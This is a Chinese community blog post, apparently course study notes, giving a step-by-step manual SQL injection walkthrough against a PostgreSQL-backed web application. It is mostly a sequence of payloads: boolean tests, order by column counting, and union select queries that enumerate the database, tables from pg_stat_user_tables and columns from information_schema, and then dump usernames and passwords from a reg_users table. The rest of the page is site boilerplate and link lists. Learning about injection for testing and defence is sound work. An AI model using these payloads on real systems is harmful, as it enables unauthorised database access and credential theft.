某教程学习笔记（一）：11、postgreasql数据库注入-摩杜云开发者社区

某教程学习笔记（一）：11、postgreasql数据库注入

TEZNKK3IfmPf 2023年11月13日 18 0

数据库

有时候很想跟她道个歉，遇见她的时候我太小了，是我不注重细节，毁了她好多温柔，是我不会爱人，抱歉。。。

---- 网易云热评

一、判断是否存在注入

and 1=2 返回错误

and 1=1 返回正常，存在注入

and 1::int=1 返回正常说明是postgresql数据库

二、判断字段数量

order by 5 返回错误

某教程学习笔记（一）：11、postgreasql数据库注入

order by 4 返回正常说明，有四列

某教程学习笔记（一）：11、postgreasql数据库注入

三、联合查询

union select '1','2','3','4' 可以看出2/3号位置显示

某教程学习笔记（一）：11、postgreasql数据库注入

四、获取当前数据库

union select '1',current_database(),'3','4'

某教程学习笔记（一）：11、postgreasql数据库注入

五、获取第一个表

union select '1',relname,'3','4' from pg_stat_user_tables limit 1 offset 0

某教程学习笔记（一）：11、postgreasql数据库注入

获取第二个表

union select '1',relname,relname,'4' from pg_stat_user_tables limit 1 offset 1

六、获取第一个字段

union select '1',column_name,'3','4' from information_schema.columns where table_name='reg_users' limit 1 offset 0

某教程学习笔记（一）：11、postgreasql数据库注入

获取第二个字段

union select '1',column_name,'3','4' from information_schema.columns where table_name='reg_users' limit 1 offset 1

七、获取字段内容

union select '1',''||name||','||password||'','3','4' from reg_users

某教程学习笔记（一）：11、postgreasql数据库注入

【版权声明】本文内容来自摩杜云社区用户原创、第三方投稿、转载，内容版权归原作者所有。本网站的目的在于传递更多信息，不拥有版权，亦不承担相应法律责任。如果您发现本社区中有涉嫌抄袭的内容，欢迎发送邮件进行举报，并提供相关证据，一经查实，本社区将立刻删除涉嫌侵权内容，举报邮箱： cloudbbs@moduyun.com

上一篇：【Rocky】 Rocky Linux 8.4 正式版安装、使用测试下一篇：解决“set transaction isolation level read uncommitted；“命令无法修改MySQL数据库隔离级别的问题

分享：

最后一次编辑于 2023年11月13日 0

暂无评论

推荐阅读

【MySQL】库操作和表操作

TEZNKK3IfmPf 2024年05月31日 38 0 0 数据库 mysql

mysql explain type 枚举

TEZNKK3IfmPf 2024年05月31日 37 0 0 数据库 mysql 索引

怎么给数据库某个字段建立一个前缀索引

TEZNKK3IfmPf 2024年04月26日 40 0 0 数据库 sql mysql

数据库事务

TEZNKK3IfmPf 2024年04月26日 57 0 0 java 数据库 sql

使用String.valueOf()的坑

TEZNKK3IfmPf 2024年04月26日 57 0 0 字符串 java 数据库

如何开启MySQL的慢查询日志

TEZNKK3IfmPf 2024年04月26日 41 0 0 数据库 mysql 慢查询

使用EFCore连接SQLite

TEZNKK3IfmPf 2024年05月31日 27 0 0 sqlite 数据库

Oracle 跨库查询复制表数据

TEZNKK3IfmPf 2024年05月17日 29 0 0 数据库 Oracle

【MySQL】锁机制

TEZNKK3IfmPf 2024年05月31日 31 0 0 数据库 mysql

Confluence 6 找到未使用的空间

TEZNKK3IfmPf 2024年05月17日 53 0 0 Confluence 数据库

oracle学习32-plsql版本低需到配置文件中添加配置

TEZNKK3IfmPf 24天前 44 0 0 数据库 Oracle

Confluence 6 升级自定义的站点和空间获得你的自定义布局

TEZNKK3IfmPf 2024年05月17日 49 0 0 数据库 sql mysql

SQL SERVER 表分区造成插入慢？

TEZNKK3IfmPf 24天前 37 0 0 数据库 SqlServer table

MySQL中的并发控制，读写锁，和锁的粒度

TEZNKK3IfmPf 2024年05月17日 48 0 0 数据库 mysql

linux篇-rpm包安装mysql数据库

TEZNKK3IfmPf 24天前 38 0 0 linux 数据库 mysql

分库分表详解

TEZNKK3IfmPf 2024年05月31日 27 0 0 数据库 mysql

SQL SERVER - 使用MERGE语句完成单向表同步

TEZNKK3IfmPf 24天前 35 0 0 数据库表

项目开发计划（GB856T——88）基于协同的在线表格forture-sheet

TEZNKK3IfmPf 24天前 22 0 0 数据库

THINKPHP5操作数据库代码示例

TEZNKK3IfmPf 2024年05月17日 41 0 0 数据库

MySQL Explain关键字：`EXPLAIN ANALYZE` 的使用

TEZNKK3IfmPf 2024年05月17日 67 0 0 数据库 mysql

TEZNKK3IfmPf

作者其他文章更多

使用代码获得所有适用于创建的transaction type

2024-06-14

C/C++ realloc()函数解析

2024-06-14

生成一个文件保存在指定的文件夹中思路 python

2024-06-14

Windows 10封装中出现“无法验证你的Windows安装”错误解决方法

2024-06-14

109-修改返回体的内容RestControllerAdvice

2024-06-14

C/C++ 判断进程是否存在

2024-06-14

使用面向对象重构之-使用接口完成行为抽象

2024-06-14

使用面向对象重构之-把抽象控制在一处：提高内聚性

2024-06-14

重操旧业障碍多

2024-06-14

关于关闭自动装配

2024-06-14

最新推荐更多

使用代码获得所有适用于创建的transaction type

2024-06-14

C/C++ realloc()函数解析

2024-06-14

生成一个文件保存在指定的文件夹中思路 python

2024-06-14

Windows 10封装中出现“无法验证你的Windows安装”错误解决方法

2024-06-14

109-修改返回体的内容RestControllerAdvice

2024-06-14

C/C++ 判断进程是否存在

2024-06-14

使用面向对象重构之-使用接口完成行为抽象

2024-06-14

使用面向对象重构之-把抽象控制在一处：提高内聚性

2024-06-14

重操旧业障碍多

2024-06-14

关于关闭自动装配

2024-06-14

使用面向对象重构之-从过程式设计到面向对象

2024-06-14

nodejs部署神器pm2的使用体验

2024-06-14

java虚拟机启动过程解析

2024-06-14

mysql-忘记密码时重置操作

2024-06-14

Callable和runnable的区别

2024-06-14

python的粘包和分包

2024-06-14

tftp文件服务（udp端口：69）

2024-06-14

C语言反汇编 - 流程控制与循环结构

2024-06-14

python-列表包字典-根据字典的某一个键的值来进行排序

2024-06-14

使用面向对象重构之-使用接口抽象完成不同维度的扩展

2024-06-14